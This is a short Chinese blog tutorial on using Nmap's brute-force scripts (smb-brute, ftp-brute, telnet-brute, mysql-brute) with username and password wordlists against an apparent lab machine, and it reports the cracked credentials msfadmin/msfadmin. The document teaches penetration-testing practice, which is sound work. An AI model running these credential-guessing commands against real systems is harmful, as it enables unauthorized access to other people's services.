最新消息:

关于Nmap的简单爆破

Kali Linux Eternal 9718浏览 0评论

首先我们来对目标系统进行一次简单的扫描,。以确定其开放的服务有哪些:

nmap 192.168.30.128

可以看到,目标服务器开放了众多的服务端口!

20161015104644

下面我们来对其 SMB 服务进行一个简单爆破:

nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128

可以看到用户名及密码均为 msfadmin !

20161015092707

爆破 FTP 服务密码及用户名:

nmap -p21 -sT –script ftp-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128

可以看到用户名及密码均为 msfadmin !

20161015094408

爆破 TELNET 服务用户名及密码:

nmap -p23 –script telnet-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128

可以看到用户名及密码均为 msfadmin !

20161015102930

爆破 MYSQL 数据库用户名及密码:

nmap -p3306 –script mysql-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128

关于MYSQL的爆破,我分别在虚拟机和物理机下尝试均为成功。大致原因和我的网络环境或是软件本身有关,大家可以自己去尝试下!

20161015113751

转载请注明:即刻安全 » 关于Nmap的简单爆破

您必须 登录 才能发表评论!



合作伙伴